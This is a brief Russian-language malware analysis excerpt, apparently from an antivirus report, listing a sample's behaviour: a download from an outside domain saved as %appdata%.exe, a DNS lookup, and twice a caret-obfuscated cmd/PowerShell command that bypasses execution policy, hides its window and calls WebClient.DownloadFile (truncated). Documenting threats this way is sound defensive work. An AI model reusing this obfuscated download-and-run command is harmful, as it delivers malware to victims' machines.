Техническая информация
- http://lolotocoporo.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "powERshe^Ll.^E^X^e -E^XEcu^t^i^oN^P^oLicY ^b^y^P^AsS -^Nop^RofIL^E -wiNd^O^WS^Ty^LE^ HIdD^e^N (^N^ew^-Ob^J^EcT^ ^sy^STEm.N^eT.webCl^iENT^).dOw^NLOA^d^fIL^E('http://lolotocoporo.wa...
- DNS ASK lo####coporo.wang
- '<SYSTEM32>\cmd.exe' /c "powERshe^Ll.^E^X^e -E^XEcu^t^i^oN^P^oLicY ^b^y^P^AsS -^Nop^RofIL^E -wiNd^O^WS^Ty^LE^ HIdD^e^N (^N^ew^-Ob^J^EcT^ ^sy^STEm.N^eT.webCl^iENT^).dOw^NLOA^d^fIL^E('http://lolotocoporo.wa...' (со скрытым окном)